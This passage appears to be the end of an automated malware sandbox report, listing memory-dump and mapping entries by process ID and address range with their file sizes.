                                                                                                                                                                                                                                                                          • memory/3264-467-0x0000000005720000-0x0000000005721000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3548-354-0x00000000054D0000-0x00000000054D1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3548-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3640-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3836-452-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/3836-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3836-470-0x0000000005610000-0x0000000005611000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3920-278-0x0000000001120000-0x0000000001121000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3920-303-0x000000001B940000-0x000000001B942000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3920-266-0x0000000000C10000-0x0000000000C11000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3920-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4040-394-0x000000001D1C0000-0x000000001D1C2000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4040-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4084-319-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                          • memory/4084-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4092-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4140-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4248-547-0x0000000004D60000-0x0000000004D61000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4264-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4272-422-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/4272-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4272-462-0x0000000005740000-0x0000000005741000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4320-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4324-341-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4324-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4384-444-0x0000000002950000-0x0000000002951000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4384-400-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4408-133-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                          • memory/4408-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                          • memory/4408-147-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/4408-134-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                          • memory/4408-135-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                          • memory/4408-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4408-140-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            152KB

                                                                                                                                                                                                                                                                          • memory/4408-145-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/4408-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                          • memory/4408-146-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/4408-143-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/4408-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                          • memory/4408-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                          • memory/4444-429-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/4444-482-0x0000000005F80000-0x0000000005F81000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4444-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4568-307-0x000000001B110000-0x000000001B112000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4568-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4568-292-0x00000000004D0000-0x00000000004D1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4672-281-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4672-267-0x0000000004DD0000-0x0000000004E19000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            292KB

                                                                                                                                                                                                                                                                          • memory/4672-287-0x000000000DB30000-0x000000000DB31000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4672-275-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4672-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4672-254-0x00000000005D0000-0x00000000005D1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4672-294-0x000000000E230000-0x000000000E231000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4672-259-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4744-538-0x0000000005670000-0x0000000005671000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4744-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4744-490-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/5088-412-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5088-533-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/5088-559-0x0000000005CD0000-0x0000000005CD1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/5312-554-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/5356-500-0x00000000048D0000-0x0000000004DCE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            5.0MB